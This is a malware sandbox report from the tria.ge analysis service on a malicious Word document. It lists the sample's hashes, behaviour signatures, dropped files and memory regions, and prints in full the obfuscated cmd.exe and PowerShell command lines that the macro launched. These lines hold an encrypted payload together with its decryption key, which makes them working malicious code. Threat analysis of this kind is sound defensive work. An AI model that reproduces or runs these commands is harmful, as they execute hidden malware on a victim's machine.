Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    101s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/09/2024, 05:41

General

  • Target

    eab06280ca8765bc669aabad584eef2f_JaffaCakes118.doc

  • Size

    133KB

  • MD5

    eab06280ca8765bc669aabad584eef2f

  • SHA1

    8ddbeadaf758bd0c71e586fabe098250035280e8

  • SHA256

    646d34d0bf6e22558a3a5d2787e60786d9d31ee2b2c0e3df19a090c88f2a90f3

  • SHA512

    734442473604f0390568c408787f78797c1738de6c926dbbebd24b8427454dee830b5d9ddfcd76bf4fb5b7791f4caed60fc94ce951dec9f4f8cb5071ec54b620

  • SSDEEP

    1536:Zj2Uk8ywBOn/c+a9E0HxJP/ufSMRZ1AWDZgyV2C8t9rBM:sUtHcb0rP/uhRMpK2CM

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eab06280ca8765bc669aabad584eef2f_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" CEhFmGjbRu lNYcfrUfhGJhdhXicOoKcu LFAwwDBfikl & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %pYPVBFduCvHQDMU%=ZdtciJwhDrjpUQ&&set %GotSlJBLT%=p&&set %dGIzTPdVR%=o^w&&set %tXriWwjaUHTXqSn%=omjZPMijjfZhS&&set %ouHZAfCOuiKmhL%=!%GotSlJBLT%!&&set %JWoZlBkYZqYOwIm%=GTjuPDzG&&set %zsACpVmAZwRpMB%=e^r&&set %qDiuELItjKfu%=!%dGIzTPdVR%!&&set %TkbGWUpFTr%=s&&set %uBhsHwrWBIKkfzE%=DOPwKKQDs&&set %fjWitFjS%=he&&set %OnqcPWAmV%=ll&&!%ouHZAfCOuiKmhL%!!%qDiuELItjKfu%!!%zsACpVmAZwRpMB%!!%TkbGWUpFTr%!!%fjWitFjS%!!%OnqcPWAmV%! "& ( $vERBosEprEferENCe.tostRinG()[1,3]+'X'-joIN'') ( ( [RuNtimE.inTeRoPseRvICeS.mArshAL]::pTrtOStriNgaNSI( [RuNTIMe.INteroPSERVICEs.MARShAl]::SecuREstrINgtogLOBAlalLoCAnsI($('76492d1116743f0423413b16050a5345MgB8AFcAQwA1AFcARQBhAFoAUQBHAFgAWAB3AGEAbABxAEsAbQBxAHIAZgBJAGcAPQA9AHwAMABjAGMAYQBhADkANgA3AGIAYgBhADIANgA1ADkAOAA5ADkAOQBmAGQAOAA3AGYAMAA4AGQANABmADYAMQA1ADIANQBlADIAZABjADcAZQBiAGEAMwBmAGUAMQBmADIANwA0ADQANwA5AGUANgA3ADQAZABmADIAMgA3ADcANAAzAGMAYQA4AGYAZABkADYAYgBiAGEANwBiADIAYgBmADQANQA5ADcAZgA2AGQAMgA1AGMANAAwAGQAMABlAGYANQA3AGQANABhADAAMQA0AGEAOQA1AGUAOQAyADcAMABiAGEAZQAwADgAMABiAGUAOQBiAGIAMQAxADgAMwBjADQAMgA2AGYAYQBlADUAYQAzADIAZgBhADEAZAA1ADUAZAAwAGYANAA1ADMAZAAwADIAYwAzADMAOQAxAGEAYQA5AGYAYQBkADkAYQBiAGYAYwBkADUAYQAxADEAOQA5AGIAOQA3ADQANABkADUANABlADMAOABiADYAZgA2AGEANwA3ADAAMQBlADQAZgAyAGMAYQA0ADQANAA2ADUANQBiADIAZQA3ADcAMQBkADQAYwAzADUAMQAwAGEAYQA1AGUAMgA4AGEAZgBiADgAMQAyAGQAOQA1ADQAZQAxAGUAMgAwAGUAMwAxADkAOQA0ADYAMgA2ADYAMQBiADkAMQA2ADkAMgA0ADUANAAwAGQAZgA2ADgANQA4ADUAZAAzAGIAZABhAGIAYwBmAGMANQA4ADQAMgAyADUAYgA2AGQAYwA4ADMANQA1ADUAYQBlADMAYQAwAGQANwA2ADYAYQBkAGUAMwAyADIAMgA2ADAAOQA3ADQANgAzADMAYQA2AGEAZgA2AGQAMwA2ADYANQAzAGYAZQA2AGQAZABmADcANwBiAGIANQA3AGQANQBjAGYANABhADUAMQAxAGUANgBmADAAZABiAGEANgA5AGEAOQAwADQAOAA2AGIANABjADUAMgA4ADgAZAAzAGQAYwAzADYAMQBmADAAMQAwADkANQBlADMAZABhAGIAOQA0AGYAOAAwADAAYgBkADEAMAA2ADUAZAA4AGQAOQA4ADYANQBmAGUAOAA5ADIAYwBlAGEAZQAzADAAMQAxAGIAMgA4ADUANgBiAGUAZABmADIANgA5ADAAMgAyADkAMwBiADUAMgBkADAAZABhADQANAAxADEANgBiADUAMgBiADEAMQA3ADIAZAA4ADkAMQA3AGMANQA4AGQAYgBlADcAMgA3ADgAMAA3AGMAYgBlAGQAYwAyAGEAYwA5AGMAMgA3AGIAMwBkADAAMgA2ADQAOAA1AGIAZgBiAGIANQA2ADYAOAAwAGUANAA4ADIAOQA4AGEAYQA5ADUAYwAyAGMANgAyADUAMwA5ADAAZgA4ADAAMgBhADMAZgA3ADEAMAA3AGUAZQA3AGMAZAA4ADgAZQBkAGIAZQAwAGYAYwA4ADQAZgBhADAANQBlADEANAA2AGQANQBlADMAMwBjAGQAYgBiAGQAMwA1AGUANgAxADUAYQAwADgANgBlAGQAYwA5ADYAOAA4ADEAYQAzAGQAMQAxADIAYgBjAGUAZAA2AGEAMQAzADcANwBmADIANwA4ADUAMgA1AGYAZAAyADcAYQBiADQAYQA4AGQAMQA0AGIAZAAxADcAMgBhAGEANgA5AGYAZAAyAGYAOAA1ADIAYgA1ADcAYgA0ADAAMAA2ADAAZABiADUAYgA1ADUANwBmADkAMABkAGQAOABkAGUAMAA1AGIAZAA1AGYANwBjADUANwA0AGIAOQA2AGYAMwBjADYAMQA1ADUAOABlADYAOQBlADAAMAA5AGIANQAzAGUAMgBlAGEAOABmADkAOABmADcANwA1ADMAZAA2ADUAYwA1AGQAMABhADgAZQBlAGUAZgA5ADcANwBiADYAMwA5ADEANAAzADkAMQBjADIAYgAyADkAMwAyADAAOAA3AGIAMQBjAGYAOAA0ADEAYQA2ADgAOQA2AGQANgAzADUAYwBkADEAYgBlAGUAZgA1ADYAZAAzADIAYwAxAGQANgBiADEAZgBlADEANABiADcAMABiADYAMQA4ADYAMAA5ADUAMABmAGIAYQAyADUANQBhAGIAOQA4AGQAYgBlAGQANwA4AGYAZQBiAGQANwBlAGIAOQA3AGQAMgBiADUANgA4AGIANgAyADcANABhAGMAOAA1ADcAMAAxADIAYwA5ADAAMQAwADgANgBkAGQANwBkADEANwAzAGEAOQBkAGYANwBkADEAMAAwAGIANgAzAGYAZgA5ADMAZAAzADUAZABkADcANgBiAGUAOQAyADIAYgA2ADEAZQBjAGEAMgBkAGIAYQAyAGYAMwA1ADgAMgA4AGYAZgA1ADIAYwBiADkAMwBkADYANwAzADAAZgA2ADIAMABlADYAMAA2ADkAMwBiAGMAYwA2AGIAZQA4ADIAMQBmAGIAYgA4AGEAYwAyADgAZgA5ADMANABiADgAMgBmADMAYwBmADMAMgBjADEAOQAyAGUAMAA0ADkAYwAzADcAMQA5ADAAZAA3ADYAMAAyADEAYgAwADkAYQAwAGMAOAAzADkANAAxADQAZgBjADkAMQAwADYAYwA4AGUANwA2AGYANQAxAGEAOAA1ADQANgAxADMANgBmADcAZQA1ADcANQAzAGEANAA1ADYANgBmADEANABmAGIAMQA3ADUANgA3AGIAOQA1ADgAYwA5AGUAOABmADQANQA1ADgAMQBmAGMAOAA1ADAANgAwADMANgBiAGUANQBiADYAZgBlAGIAZAAwADUAOQA5ADEAMwA0ADMAZABiAGUAZABhAGIAZgA4AGMAZQBkADYAMQA4ADYAYgBlADYANgBmADgAOQA5ADcAZQBhADEAOAA0ADIAYwBiADAAMgBhAGMANgBlADEAMwAyAGEANQAwADIAMAA3ADUANQBiADUAZQAxADIANgBmAGQANgA4AGYANwA3AGQAZAAzAGYAZgA5ADYAMAAyADgAMQBmADcAMwAwADUAYgBhAGMAYQAzADUAYwAwAGYAZABjAGEANwA5ADgAOQAwAGIAMQAxADUAMABmADQAOQBlADQAMgAxADAANAAwAGYAZAAwAGMANAAwADcAZAA5AGQAZAAzAGIAMABhADcANQBkADUAZgA5AGEANQBmADgAZAA3ADkAYQA3ADgAZgBjADUANwA5AGEAMQA4ADYAOAA0AGMAMAA1ADQAYQAwADAAOAA3ADgAMAAwADQAMwAxADYAZAA3ADQAZQA0ADcAYwA2AGIAMABiADgANAAzADUANgA4AGYAYQA3AGIAMQA0ADUAZgBlAGMANgBiADUAZgAzAGQAZQBlAGYAMgBhAGYAZAA2ADIANgBmADMAMAAyADIANQBmADYANwAyADYAMAAwAGQAZAAyADkAYgBhAGEAZQBjAGUAOAAxAGMANgAwAGUAYQBkADAAYwA3ADcAOQAwAGYAMAA3ADIANgBjADcANwBiAGYAOAAxADkAZAAwADkANAA2ADgAYwBmADAAOQBmAGIAYQAxADYAMgBkAGUAOABkAGMAYwA4AGYAZAAyADIAYQA5ADEANgBhADkAMQBkADEANQAyADkANQAzADUAZABkADUAZgBjAGQAZAA2AGYANgBkAGEANgBmADAAMQA4AGYANAA5ADIAYgA0AGUAYQA3AGQANwA0ADYAMwBmAGYAYgA3AGQANQBlADUAZgAwAGQAZABkAGEANwAwADcAOAAzAGUANABlADIAYgBiADQANQBmADQANgBiADMAYQA1AGYANgAyADYAMgA2AGYANAA4ADYAMQBkAGYAYQA5ADYAOQA3AGIANAA3ADcAOABlAGIAZQBhAGIAMABkADcAOAAxAGQANwBjADcAOQBkADAAMwBlADgANQBhAGQAYQBmADIAYQA4ADUANQA1ADIANQBhAGUAZQBkADkAMwAyAGQAZQBkAGQAOAAzADcAMAA4AGIANAAxADYAMgBlAGUAZQA5AGQANAAzADEAOAA4ADYAZABjADgAMwBlADUAYQA2AGIAMwA5ADgANgAwADIA'| coNVerTTo-SecUREsTrINg -kE 34,56,154,207,43,77,163,192,141,241,250,175,127,43,79,52)) )) )
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell "& ( $vERBosEprEferENCe.tostRinG()[1,3]+'X'-joIN'') ( ( [RuNtimE.inTeRoPseRvICeS.mArshAL]::pTrtOStriNgaNSI( [RuNTIMe.INteroPSERVICEs.MARShAl]::SecuREstrINgtogLOBAlalLoCAnsI($('76492d1116743f0423413b16050a5345MgB8AFcAQwA1AFcARQBhAFoAUQBHAFgAWAB3AGEAbABxAEsAbQBxAHIAZgBJAGcAPQA9AHwAMABjAGMAYQBhADkANgA3AGIAYgBhADIANgA1ADkAOAA5ADkAOQBmAGQAOAA3AGYAMAA4AGQANABmADYAMQA1ADIANQBlADIAZABjADcAZQBiAGEAMwBmAGUAMQBmADIANwA0ADQANwA5AGUANgA3ADQAZABmADIAMgA3ADcANAAzAGMAYQA4AGYAZABkADYAYgBiAGEANwBiADIAYgBmADQANQA5ADcAZgA2AGQAMgA1AGMANAAwAGQAMABlAGYANQA3AGQANABhADAAMQA0AGEAOQA1AGUAOQAyADcAMABiAGEAZQAwADgAMABiAGUAOQBiAGIAMQAxADgAMwBjADQAMgA2AGYAYQBlADUAYQAzADIAZgBhADEAZAA1ADUAZAAwAGYANAA1ADMAZAAwADIAYwAzADMAOQAxAGEAYQA5AGYAYQBkADkAYQBiAGYAYwBkADUAYQAxADEAOQA5AGIAOQA3ADQANABkADUANABlADMAOABiADYAZgA2AGEANwA3ADAAMQBlADQAZgAyAGMAYQA0ADQANAA2ADUANQBiADIAZQA3ADcAMQBkADQAYwAzADUAMQAwAGEAYQA1AGUAMgA4AGEAZgBiADgAMQAyAGQAOQA1ADQAZQAxAGUAMgAwAGUAMwAxADkAOQA0ADYAMgA2ADYAMQBiADkAMQA2ADkAMgA0ADUANAAwAGQAZgA2ADgANQA4ADUAZAAzAGIAZABhAGIAYwBmAGMANQA4ADQAMgAyADUAYgA2AGQAYwA4ADMANQA1ADUAYQBlADMAYQAwAGQANwA2ADYAYQBkAGUAMwAyADIAMgA2ADAAOQA3ADQANgAzADMAYQA2AGEAZgA2AGQAMwA2ADYANQAzAGYAZQA2AGQAZABmADcANwBiAGIANQA3AGQANQBjAGYANABhADUAMQAxAGUANgBmADAAZABiAGEANgA5AGEAOQAwADQAOAA2AGIANABjADUAMgA4ADgAZAAzAGQAYwAzADYAMQBmADAAMQAwADkANQBlADMAZABhAGIAOQA0AGYAOAAwADAAYgBkADEAMAA2ADUAZAA4AGQAOQA4ADYANQBmAGUAOAA5ADIAYwBlAGEAZQAzADAAMQAxAGIAMgA4ADUANgBiAGUAZABmADIANgA5ADAAMgAyADkAMwBiADUAMgBkADAAZABhADQANAAxADEANgBiADUAMgBiADEAMQA3ADIAZAA4ADkAMQA3AGMANQA4AGQAYgBlADcAMgA3ADgAMAA3AGMAYgBlAGQAYwAyAGEAYwA5AGMAMgA3AGIAMwBkADAAMgA2ADQAOAA1AGIAZgBiAGIANQA2ADYAOAAwAGUANAA4ADIAOQA4AGEAYQA5ADUAYwAyAGMANgAyADUAMwA5ADAAZgA4ADAAMgBhADMAZgA3ADEAMAA3AGUAZQA3AGMAZAA4ADgAZQBkAGIAZQAwAGYAYwA4ADQAZgBhADAANQBlADEANAA2AGQANQBlADMAMwBjAGQAYgBiAGQAMwA1AGUANgAxADUAYQAwADgANgBlAGQAYwA5ADYAOAA4ADEAYQAzAGQAMQAxADIAYgBjAGUAZAA2AGEAMQAzADcANwBmADIANwA4ADUAMgA1AGYAZAAyADcAYQBiADQAYQA4AGQAMQA0AGIAZAAxADcAMgBhAGEANgA5AGYAZAAyAGYAOAA1ADIAYgA1ADcAYgA0ADAAMAA2ADAAZABiADUAYgA1ADUANwBmADkAMABkAGQAOABkAGUAMAA1AGIAZAA1AGYANwBjADUANwA0AGIAOQA2AGYAMwBjADYAMQA1ADUAOABlADYAOQBlADAAMAA5AGIANQAzAGUAMgBlAGEAOABmADkAOABmADcANwA1ADMAZAA2ADUAYwA1AGQAMABhADgAZQBlAGUAZgA5ADcANwBiADYAMwA5ADEANAAzADkAMQBjADIAYgAyADkAMwAyADAAOAA3AGIAMQBjAGYAOAA0ADEAYQA2ADgAOQA2AGQANgAzADUAYwBkADEAYgBlAGUAZgA1ADYAZAAzADIAYwAxAGQANgBiADEAZgBlADEANABiADcAMABiADYAMQA4ADYAMAA5ADUAMABmAGIAYQAyADUANQBhAGIAOQA4AGQAYgBlAGQANwA4AGYAZQBiAGQANwBlAGIAOQA3AGQAMgBiADUANgA4AGIANgAyADcANABhAGMAOAA1ADcAMAAxADIAYwA5ADAAMQAwADgANgBkAGQANwBkADEANwAzAGEAOQBkAGYANwBkADEAMAAwAGIANgAzAGYAZgA5ADMAZAAzADUAZABkADcANgBiAGUAOQAyADIAYgA2ADEAZQBjAGEAMgBkAGIAYQAyAGYAMwA1ADgAMgA4AGYAZgA1ADIAYwBiADkAMwBkADYANwAzADAAZgA2ADIAMABlADYAMAA2ADkAMwBiAGMAYwA2AGIAZQA4ADIAMQBmAGIAYgA4AGEAYwAyADgAZgA5ADMANABiADgAMgBmADMAYwBmADMAMgBjADEAOQAyAGUAMAA0ADkAYwAzADcAMQA5ADAAZAA3ADYAMAAyADEAYgAwADkAYQAwAGMAOAAzADkANAAxADQAZgBjADkAMQAwADYAYwA4AGUANwA2AGYANQAxAGEAOAA1ADQANgAxADMANgBmADcAZQA1ADcANQAzAGEANAA1ADYANgBmADEANABmAGIAMQA3ADUANgA3AGIAOQA1ADgAYwA5AGUAOABmADQANQA1ADgAMQBmAGMAOAA1ADAANgAwADMANgBiAGUANQBiADYAZgBlAGIAZAAwADUAOQA5ADEAMwA0ADMAZABiAGUAZABhAGIAZgA4AGMAZQBkADYAMQA4ADYAYgBlADYANgBmADgAOQA5ADcAZQBhADEAOAA0ADIAYwBiADAAMgBhAGMANgBlADEAMwAyAGEANQAwADIAMAA3ADUANQBiADUAZQAxADIANgBmAGQANgA4AGYANwA3AGQAZAAzAGYAZgA5ADYAMAAyADgAMQBmADcAMwAwADUAYgBhAGMAYQAzADUAYwAwAGYAZABjAGEANwA5ADgAOQAwAGIAMQAxADUAMABmADQAOQBlADQAMgAxADAANAAwAGYAZAAwAGMANAAwADcAZAA5AGQAZAAzAGIAMABhADcANQBkADUAZgA5AGEANQBmADgAZAA3ADkAYQA3ADgAZgBjADUANwA5AGEAMQA4ADYAOAA0AGMAMAA1ADQAYQAwADAAOAA3ADgAMAAwADQAMwAxADYAZAA3ADQAZQA0ADcAYwA2AGIAMABiADgANAAzADUANgA4AGYAYQA3AGIAMQA0ADUAZgBlAGMANgBiADUAZgAzAGQAZQBlAGYAMgBhAGYAZAA2ADIANgBmADMAMAAyADIANQBmADYANwAyADYAMAAwAGQAZAAyADkAYgBhAGEAZQBjAGUAOAAxAGMANgAwAGUAYQBkADAAYwA3ADcAOQAwAGYAMAA3ADIANgBjADcANwBiAGYAOAAxADkAZAAwADkANAA2ADgAYwBmADAAOQBmAGIAYQAxADYAMgBkAGUAOABkAGMAYwA4AGYAZAAyADIAYQA5ADEANgBhADkAMQBkADEANQAyADkANQAzADUAZABkADUAZgBjAGQAZAA2AGYANgBkAGEANgBmADAAMQA4AGYANAA5ADIAYgA0AGUAYQA3AGQANwA0ADYAMwBmAGYAYgA3AGQANQBlADUAZgAwAGQAZABkAGEANwAwADcAOAAzAGUANABlADIAYgBiADQANQBmADQANgBiADMAYQA1AGYANgAyADYAMgA2AGYANAA4ADYAMQBkAGYAYQA5ADYAOQA3AGIANAA3ADcAOABlAGIAZQBhAGIAMABkADcAOAAxAGQANwBjADcAOQBkADAAMwBlADgANQBhAGQAYQBmADIAYQA4ADUANQA1ADIANQBhAGUAZQBkADkAMwAyAGQAZQBkAGQAOAAzADcAMAA4AGIANAAxADYAMgBlAGUAZQA5AGQANAAzADEAOAA4ADYAZABjADgAMwBlADUAYQA2AGIAMwA5ADgANgAwADIA'| coNVerTTo-SecUREsTrINg -kE 34,56,154,207,43,77,163,192,141,241,250,175,127,43,79,52)) )) )
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1456

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDF013.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qb1dxcno.jtm.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

    Filesize

    1KB

    MD5

    deab29ec840203d7c63e653bbc93b967

    SHA1

    43c7a122a9ae630e53d662310b409dda58e4427a

    SHA256

    d7371a7221361d4f82168823b8ac34ec25689e569a029f793e3b3f3e4f1f6e8a

    SHA512

    c1dc61e8fd3c75a65f857add4f68d1058e471df3be1627651660ab9ce1509f56f6b047bba2ce59a416f19fd651bb68b14d03e494ca5fb388b856068e1824ff06

  • memory/1456-45-0x000001DCA8AF0000-0x000001DCA8B12000-memory.dmp

    Filesize

    136KB

  • memory/2012-37-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-39-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-8-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-11-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-12-0x00007FFF1EA50000-0x00007FFF1EA60000-memory.dmp

    Filesize

    64KB

  • memory/2012-15-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-14-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-18-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-20-0x00007FFF1EA50000-0x00007FFF1EA60000-memory.dmp

    Filesize

    64KB

  • memory/2012-19-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-17-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-16-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-13-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-7-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-6-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-4-0x00007FFF20EB0000-0x00007FFF20EC0000-memory.dmp

    Filesize

    64KB

  • memory/2012-30-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-1-0x00007FFF60ECD000-0x00007FFF60ECE000-memory.dmp

    Filesize

    4KB

  • memory/2012-38-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-10-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-41-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-40-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-44-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-9-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-5-0x00007FFF20EB0000-0x00007FFF20EC0000-memory.dmp

    Filesize

    64KB

  • memory/2012-3-0x00007FFF20EB0000-0x00007FFF20EC0000-memory.dmp

    Filesize

    64KB

  • memory/2012-69-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-71-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-70-0x00007FFF60ECD000-0x00007FFF60ECE000-memory.dmp

    Filesize

    4KB

  • memory/2012-72-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-73-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-2-0x00007FFF20EB0000-0x00007FFF20EC0000-memory.dmp

    Filesize

    64KB

  • memory/2012-79-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-80-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB

  • memory/2012-0-0x00007FFF20EB0000-0x00007FFF20EC0000-memory.dmp

    Filesize

    64KB

  • memory/2012-505-0x00007FFF20EB0000-0x00007FFF20EC0000-memory.dmp

    Filesize

    64KB

  • memory/2012-507-0x00007FFF20EB0000-0x00007FFF20EC0000-memory.dmp

    Filesize

    64KB

  • memory/2012-508-0x00007FFF20EB0000-0x00007FFF20EC0000-memory.dmp

    Filesize

    64KB

  • memory/2012-506-0x00007FFF20EB0000-0x00007FFF20EC0000-memory.dmp

    Filesize

    64KB

  • memory/2012-509-0x00007FFF60E30000-0x00007FFF61025000-memory.dmp

    Filesize

    2.0MB